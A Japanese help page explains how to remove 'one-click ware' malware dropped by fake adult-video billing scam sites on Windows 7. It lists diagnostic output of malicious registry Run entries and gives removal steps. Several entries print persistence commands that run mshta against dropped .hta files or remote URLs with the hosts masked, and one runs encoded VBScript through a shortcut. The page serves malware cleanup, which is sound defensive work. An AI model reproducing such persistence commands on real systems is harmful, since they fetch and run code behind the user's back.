【有料アダルト動画エロサイト】 ワンクリウェアウイルス駆除削除解消例 【入会登録料金請求画面】

→ ウイルスバスター ダウンロード ←

　こちらは有料アダルト動画サイトを装った架空請求ワンクリック詐欺サイト（ウイルス配信型）にて、あろうことか警告画面をサッパリ無視しウイルス（ワンクリウェア）を手動で実行してWindowsパソコンに感染させてしまうという大変嘆かわしい問題行動により、その天罰として登録入会完了料金請求画像がデスクトップ画面から消えない症状が現れる深刻な脅威についての補足ページです〜。 （#＾＿＾）/

- - - - -

不正請求ポップアップ診断無料ツール： 有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe

◆ 診断結果から見たワンクリウェアウイルス駆除例

　こちらは診断結果を元にしたワンクリウェア駆除例です。あくまでコチラのWindows 7環境で故意にウイルスを実行して感染させた状態での診断結果であって、感染パソコンごとに列挙されるキーの数、ファイル名やフォルダ名、ウイルス投下場所、レジストリの項目名、といったものがひっかかったワンクリック詐欺サイトごとにバラバラで一定しないので注意してください。

HTAファイル投下型のサンプル

　たいへんシンプルなHTAファイル投下型です。タスクスケジューラは悪用されませんでした。怪しさ判定20ポイントになってるものが不正なもので、.htaファイルをゴミ箱へ捨てて、該当のレジストリの項目をレジストリエディタで削除することで解消となります。

レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
 1 つのデータを確認しました

【キー1】
名前： Webcdy
データ： mshta "C:\ProgramData\cdy\67003.hta"
怪しさ ⇒ 20 ポイント
更新日時 ⇒ .hta ファイル要確認

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

OS環境： Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe
https://blogs.yahoo.co.jp/noooo_spam/59949792.html

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

1. エクスプローラで「67003.hta」ファイルの削除
2. レジストリエディタでRunキーの「Webcdy」項目の削除
3. ※ ファイル名や項目名は感染環境ごとに異なります.

Webアドレス直読み型のサンプル

　たいへんシンプルなWebアドレス直読み型です。タスクスケジューラは悪用されませんでした。レジストリがイジられるだけで不正なファイルとしての実体が存在しないという特徴があります。怪しさ判定30ポイント（場合によっては20ポイント）になってるものが不正なもので、該当のレジストリの項目をレジストリエディタで削除することで解消となります。

レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
 1 つのデータを確認しました

【キー1】
名前： www.adult-collection09. net
データ： mshta h**p://www.＊＊＊-＊＊＊.net/regist2.php
怪しさ ⇒ 30 ポイント
更新日時 ⇒ 確認不要（Webアドレス）

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

OS環境： Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe
https://blogs.yahoo.co.jp/noooo_spam/59949792.html

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

1. レジストリエディタでRunキーの「www.adult-collection09. net」項目の削除
2. ※ 項目名は感染環境ごとに異なります.

LNKファイル投下型のサンプル ＜１＞

　2011年半ばに投入されたシンプルなLNK（ショートカット）ファイル投下型です。タスクスケジューラは悪用されませんでした。正規のフォルダ（ここでは「Adobe」「aicon」「Winamp」）にランダムに不正なファイルをバラけて投下することで削除すべきファイルを見つけ出すのを困難にさせる努力を攻撃者は行なっております。

　怪しさ判定10ポイントの.lnkファイル（下で言うところのキー２）にあるをゴミ箱へ捨てて、該当のレジストリの項目をレジストリエディタで削除します。そして、ファイアウォールのアウトバウンド制御が機能してないと怪しさ判定20ポイントのWebアドレス直読み型（下で言うところのキー１）も登録されるので、この項目をレジストリエディタ削除することで解消されます。

レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
 1 つのデータを確認しました

【キー2】
名前： nain(Extcute)
データ： "C:\Users\[ユーザー名]\AppData\Roaming\Adobe\Extcute.lnk"
         └ C:\Users\[ユーザー名]\AppData\Roaming\aicon\appMgr2.exe //B //E:VBScript.Encode＜改行＞
"C:\Users\[ユーザー名]\AppData\Roaming\Winamp\Facility827JkV.ssh"
怪しさ ⇒ 10 ポイント
更新日時 ⇒ .lnk ファイル要確認

【キー1】
名前： Bvot2848_746899117
データ： "C:\windows\system32\mshta" h**p://＊＊＊/s3q/QPihj1bZxBqItG7Z~kadNw.htm
怪しさ ⇒ 20 ポイント
更新日時 ⇒ 確認不要（Webアドレス）

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

OS環境： Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe
https://blogs.yahoo.co.jp/noooo_spam/59949792.html

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

1. エクスプローラで「Extcute.lnk」ファイルの削除
2. レジストリエディタでRunキーの「nain(Extcute)」項目の削除
3. レジストリエディタでRunキーの「Bvot2848_746899117」項目の削除
4. ※ ファイル名や項目名は感染環境ごとに異なります.

　Windows XPに搭載されてるWindowsファイアウォールにはアウトバウンド制御が実装されてないので、いざウイルスにやられてしまった場合にパソコン内から情報がそのまま引っこ抜かれる恐れがあります。Windows Vista/7に搭載されてるWindowsファイアウォールはアウトバウンド制御が実装されてるもののデフォルトで無効になってるのでユーザーが手動で切り替えないと意味がありません。Windowsファイアフォールではなく、市販セキュリティソフトに搭載されてるファイアウォールを利用してるにもかかわらずキー１に相当するものが登録されちゃてたら、そのセキュリティソフトは？？？

LNKファイル投下型のサンプル ＜２＞

　2011年末に投入された先進的なLNK（ショートカット）ファイル投下型になります。容易に駆除されないよう攻撃者はたいへん努力をしており、いろいろと複数箇所をいじったり手を変え品を変えを続行中の段階で先がサッパリ見えません。この説明では解消できない可能性があることをご了承ください。

　残念ながら、怪しさ判定は20ポイントであるものの、もう一方が判定失敗となる0ポイントととなってますが、指定されてるURLアドレスの一致などで判断できるかと思われます。「SystemBoot.lnk」と「RegWrite.lnk」をゴミ箱へ捨てて、該当の２ヶ所のレジストリの項目「SystemBoot[長いランダム文字]」「RegWrite[長いランダム文字]」をレジストリエディタで削除することで解消・・・できると思わせて別の場所もいじられます。

レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
 2 つのデータを確認しました

【キー2】
名前： SystemBootDCYuaMGRfVxZG8r72jvzXwVotjpVqPBe
データ： C:\Users\[ユーザー名]\UserProfile\SystemBoot.lnk
         └ C:\Users\[ユーザー名]\UserProfile\htmlapp.exe h**p://＊＊＊.net/reg2.php?cccid=DCYuaMGRfVxZG8r72jvzXwVotjpVqPBe
怪しさ ⇒ 0 ポイント
更新日時 ⇒ .lnk ファイル要確認

【キー1】
名前： RegWriteDCYuaMGRfVxZG8r72jvzXwVotjpVqPBe
データ： C:\Users\[ユーザー名]\SoftRecovery\RegWrite.lnk
         └ C:\Windows\System32\mshta.exe h**p://＊＊＊.net/set_inf2.php?cccid=DCYuaMGRfVxZG8r72jvzXwVotjpVqPBe
怪しさ ⇒ 20 ポイント
更新日時 ⇒ .lnk ファイル要確認

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

OS環境： Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe
https://blogs.yahoo.co.jp/noooo_spam/59949792.html

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

　具体的には以下の場所が改ざんされる場合があります。

• タスクスケジューラ （Windows Vista/7）
  ⇒ 診断ツールで判定できます。
• スタートアップフォルダ
  ⇒ 診断ツールの調査対象外。上の診断結果で言うところの「RegWrite.lnk」ファイルが投下される場合があります。
  Windows XP → C:\Documents and Settings\[ユーザー名]\スタート メニュー\プログラム\スタートアップ\
  Windows Vista/7 → C:\Users\[ユーザー名]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
• レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
  ⇒ 診断ツールの調査対象外。Runキー部分と同等の不正な項目が登録される場合があります。

BATファイル投下型のサンプル

　2012年3月に投入されたタイプです。かつてない新手法になるため怪しさ0ポイントで判定不能です。

レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
 1 つのデータを確認しました

【キー1】
名前： webutmvn
データ： "C:\ProgramData\utmvn\XV9XMY6W"
怪しさ ⇒ 0 ポイント
更新日時 ⇒ 

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

OS環境： Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe
https://blogs.yahoo.co.jp/noooo_spam/59949792.html

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

1. エクスプローラで「XV9XMY6W.bat」ファイルの削除、「utmvn」フォルダごとの削除
   　（.batの拡張子は省略されてる）
2. レジストリエディタでRunキーの「webutmvn」項目の削除
3. ※ フォルダ名・ファイル名や項目名は感染環境ごとに異なります.

☆ ウイルスに感染したい！ おすすめしないウイルス対策がコレだ！

1. セキュリティソフトを導入して最新のウイルス定義ファイルに更新する
   ⇒ Windowsにはウイルス検出機能がないので、導入してしまうとウイルス感染に気づいてしまう恐れが！
2. ウイルス感染経路の Adobe Flash Player や Java が導入されてたら最新バージョンに更新する
   ⇒ ウイルス感染地獄への近道はセキュリティの穴を塞ぐ無料ウイルス対策をゼッタイやらないこと！
3. Windows Update の自動更新を有効化する
   ⇒ わずらわしい自動更新を無効にしてWindowsの更新をすっぽかしてウイルス感染！